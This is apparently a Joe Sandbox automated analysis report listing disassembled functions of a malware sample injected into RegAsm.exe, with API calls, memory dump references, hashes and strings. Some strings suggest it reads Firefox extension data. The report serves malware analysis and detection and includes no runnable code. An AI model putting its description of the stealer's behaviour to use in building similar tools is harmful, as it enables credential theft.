                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                        • String ID: CurrentBuildNumber
                                                                                                        • API String ID: 3676486918-1022791448
                                                                                                        • Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                        • Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
                                                                                                        • Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                        • Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50
                                                                                                        Function 0041566F Relevance: 7.6, APIs: 5, Instructions: 107registrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 004156A4
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
                                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415725
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415738
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$OpenQueryValue_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3357907479-0
                                                                                                        • Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                        • Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
                                                                                                        • Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                        • Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94
                                                                                                        Function 0041BC21 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,763374F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,763374F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CreatePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 2024441833-0
                                                                                                        • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                        • Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
                                                                                                        • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                        • Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99
                                                                                                        Function 6C0AC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C0AC947
                                                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C0AC969
                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C0AC9A9
                                                                                                        • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C0AC9C8
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C0AC9E2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocInfoSystem$Free
                                                                                                        • String ID:
                                                                                                        • API String ID: 4191843772-0
                                                                                                        • Opcode ID: 7a87667543131b6822473b47ad9449e85a4dacc0dec20f22a980bd586c11b9cd
                                                                                                        • Instruction ID: 98e9a940971da46dd2a8a60f3b8bb194c714d8754ae9cba4fd8f101b71878c51
                                                                                                        • Opcode Fuzzy Hash: 7a87667543131b6822473b47ad9449e85a4dacc0dec20f22a980bd586c11b9cd
                                                                                                        • Instruction Fuzzy Hash: 32212971711204ABDB04AAE8CC89BAE73F9AB4A344F51011AF907A7F41DB319C048B95
                                                                                                        Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                        • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                        • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CrackInternetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1274457161-0
                                                                                                        • Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                        • Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
                                                                                                        • Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                        • Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94
                                                                                                        Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetEnvironmentVariableA.KERNELBASE(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B
                                                                                                        Strings
                                                                                                        • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                        • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                        • API String ID: 2929475105-4027016359
                                                                                                        • Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                        • Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
                                                                                                        • Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                        • Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89
                                                                                                        Function 00416DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00416DCD
                                                                                                        • lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3_catchlstrlen
                                                                                                        • String ID: ERROR
                                                                                                        • API String ID: 591506033-2861137601
                                                                                                        • Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                        • Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
                                                                                                        • Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
                                                                                                        • Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9
                                                                                                        Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                        • String ID: =A
                                                                                                        • API String ID: 3183270410-2399317284
                                                                                                        • Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                        • Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
                                                                                                        • Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                                                        • Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55
                                                                                                        Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,00437414,0043681B,?,?,?), ref: 0040B3D7
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040B529
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040B544
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040B596
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                        • String ID:
                                                                                                        • API String ID: 211194620-0
                                                                                                        • Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                        • Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
                                                                                                        • Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                        • Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99
                                                                                                        Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        • StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040D4B2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                        • API String ID: 161838763-3310892237
                                                                                                        • Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                        • Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
                                                                                                        • Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
